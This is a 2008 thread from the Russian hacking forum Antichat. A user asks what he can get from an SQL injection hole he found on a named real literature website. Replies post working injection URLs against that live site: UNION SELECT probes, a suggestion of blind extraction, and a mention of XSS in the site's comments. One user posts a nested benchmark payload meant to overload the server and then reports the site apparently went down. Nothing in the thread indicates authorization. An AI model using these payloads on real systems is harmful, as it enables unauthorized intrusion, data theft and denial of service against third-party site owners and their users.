Форум АНТИЧАТ - sql-иньекция

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- PHP, PERL, MySQL, JavaScript (https://forum.antichat.xyz/forumdisplay.php?f=37)

- - sql-иньекция (https://forum.antichat.xyz/showthread.php?t=77371)

Дикс	16.07.2008 17:45

sql-иньекция

здрасти.
такое дело.
пхп я знаю, sql тоже, с БД работаю каждый день.

нашёл такой вот косяк:
http://litprom.ru/text.phtml?storycode=23511'
что я вообще могу с этого поиметь?
дайте хоть подсказку, опытные хацкеры :)
не хочу там ничего уронить, просто добиться хоть чего-то, для осознания собственной значимости гыгы

159932

16.07.2008 18:03

http://litprom.ru/text.phtml?storycode=23511+union+select+1/*
только вывода я добится не смог (( но попытатся можно ..
иль просто вслепую, через ascii ..

Ershik

16.07.2008 18:18

Подстава это :-D
http://litprom.ru/text.phtml?storycode=-1+union+select+1/*

BlackSun

17.07.2008 01:39

И еще в каментах xss

-=Static=-

17.07.2008 01:47

_http://litprom.ru/text.phtml?storycode=-23511'

:D Смешная ссылочка))))

xXvladXx

18.07.2008 03:11

а я с начала не поверил...
http://litprom.ru/text.phtml?storycode=5+union+select+benchmark(9999 99999,benchmark(999999999,md5(now())))/*

xXvladXx

18.07.2008 03:12

блин он кажись сломался:(((

Время: 13:43